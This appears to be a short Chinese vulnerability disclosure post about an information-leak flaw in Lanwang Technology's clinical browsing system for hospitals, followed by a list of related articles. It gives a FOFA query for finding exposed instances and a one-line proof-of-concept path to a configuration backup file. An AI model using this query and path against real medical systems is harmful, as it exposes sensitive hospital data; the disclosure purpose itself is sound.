Nx01 产品简介
蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。
Nx02 漏洞描述
蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。
Nx03 产品主页
fofa-query: title=="临床浏览"
Nx04 漏洞复现
POC:
/config/config%20bak.txt
Nx05 修复建议
建议联系软件厂商进行处理。
相关推荐
山川绿水8 小时前
bugku——PWN——overflow2哼?~8 小时前
NAT、代理服务、内网穿透茉莉玫瑰花茶8 小时前
工作流的常见模式 [ 1 ]chipsense9 小时前
【安全警示】充电桩漏电保护正在被忽视:为什么B型剩余电流检测是强制刚需上海云盾-小余11 小时前
内网边界安全管控:访问权限隔离与入侵阻断方案南京码讯光电技术有限公司11 小时前
工业无线AP选型指南:从WiFi 5到WiFi 6+5G CPE,如何构建全覆盖、零漫游、高可靠的智能工厂网络?许彰午11 小时前
加密解密加签验签——接口安全的最后一道防线智慧医养结合软件开源11 小时前
智慧养老系统医生管理模块:专业赋能,筑牢老人诊疗安全防线二宝哥11 小时前
Linux虚拟机网络配置陳103012 小时前
Linux:进程间通信 和 简单进程池